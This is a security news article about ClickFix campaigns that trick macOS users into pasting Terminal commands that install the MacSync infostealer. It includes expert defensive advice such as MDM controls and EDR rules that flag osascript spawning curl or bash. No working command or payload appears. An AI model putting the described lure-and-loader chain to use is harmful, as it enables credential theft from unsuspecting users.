A series of three ClickFix campaigns targeting macOS users with the MacSync infostealer leveraged social engineering to trick victims into installing the malware, according to Sophos researchers.In a March 11 blog post, the researchers said the campaigns show a clear progression in sophistication over the last three months: The first used fake Google search ads promoting a fraudulent “ChatGPT Atlas” browser download hosted on Google Sites. When users attempted to download the software, they were prompted to run a command that ultimately installed the MacSync infostealer.A second campaign directed users to shared ChatGPT conversations that appeared to offer legitimate advice about Mac tools, explained the researchers. Those conversations then led victims to malicious pages that mimicked trusted developer platforms such as GitHub.According to the researchers, the third campaign introduced more advanced techniques, including multi-stage loaders, AppleScript payloads, and in-memory execution designed to evade detection and improve persistence.The Sophos team said these three campaigns reflect a broader trend: attackers are increasingly targeting macOS and continuously adjusting their methods in response to defenses and investigations. The evolving ClickFix strategy demonstrates how social engineering, combined with adaptable malware delivery, remains a powerful tool for cybercriminals seeking to steal credentials and sensitive data.Collin Hogue-Spears, senior director of solution management at Black Duck, explained that ClickFix slips past file-based macOS defenses because the user executes the attack through Terminal, a surface most security teams still treat as unmanaged.“ClickFix is not really a software exploit, it’s a trust exploit,” said Hogue-Spears. “The user runs the attack voluntarily. Recent campaigns used Google-sponsored links and shared ChatGPT conversations to walk users through what looked like legitimate software installs. In the February 2026 macOS variant, the user pastes one command into Terminal, the loader retrieves AppleScript from command and control, and the payload executes in memory without writing to disk.”Hogue-Spears said security practitioners must treat Terminal as a privileged application on macOS endpoints. Here’s his advice:Michael Bell, co-founder and CEO at Suzu Labs, said while training is the obvious fix, it's the wrong first move here, because the attack mimics something developers legitimately do every day. Bell said Homebrew, Rust, nvm, and dozens of other tools install through `curl | sh` in Terminal, so we can't tell technical staff "never paste commands" when that's how half their toolchain actually works.“Security teams need to solve this upstream with managed package registries, MDM-enforced application distribution, and allowlisted installation sources that take the decision out of individual hands,” said Bell. “If someone on the team needs to evaluate a new AI tool, that should happen in a sandboxed environment with no access to production credentials, SSH keys, or cloud tokens. The 20 campaigns Pillar Security documented in the last six weeks show that this is now an industrialized attack surface, not a novelty, and organizations need to treat every developer workstation as a high-value target.”Jaron Bradley, director, Jamf Threat Labs, said AI has accomplished many great things, especially in giving us instant answers that once required multiple clicks through Google results to find. However, Bradley said this convenience has also made many users more reckless than before.“It's important to keep in mind that just like humans, AI can also be tricked from time-to-time,” said Bradley. “Google Sponsored Ads have played — and will likely continue to play — a significant role in the distribution of infostealer malware. Attackers understand the common software needs of users and craft malicious ads that appear legitimate, and then wait for the user to stumble upon them.”
- Push MDM configuration profiles that block Terminal and command-line interpreter access for standard user accounts.
- Layer a Privacy Preferences Policy Control payload that pre-denies Terminal Full Disk Access; this stops the fake System Preferences credential dialog from escalating permissions even when the user enters their password.
- Deploy EDR behavioral rules that flag osascript spawning curl or bash child processes (T1059.002 chaining to T1059.004), because that exact parent-child chain is the February 2026 variant's execution signature. Baseline the organization’s developer population first; curl-pipe-shell from Terminal is also how Homebrew installs. Those three controls break every stage of the current ClickFix macOS execution chain.
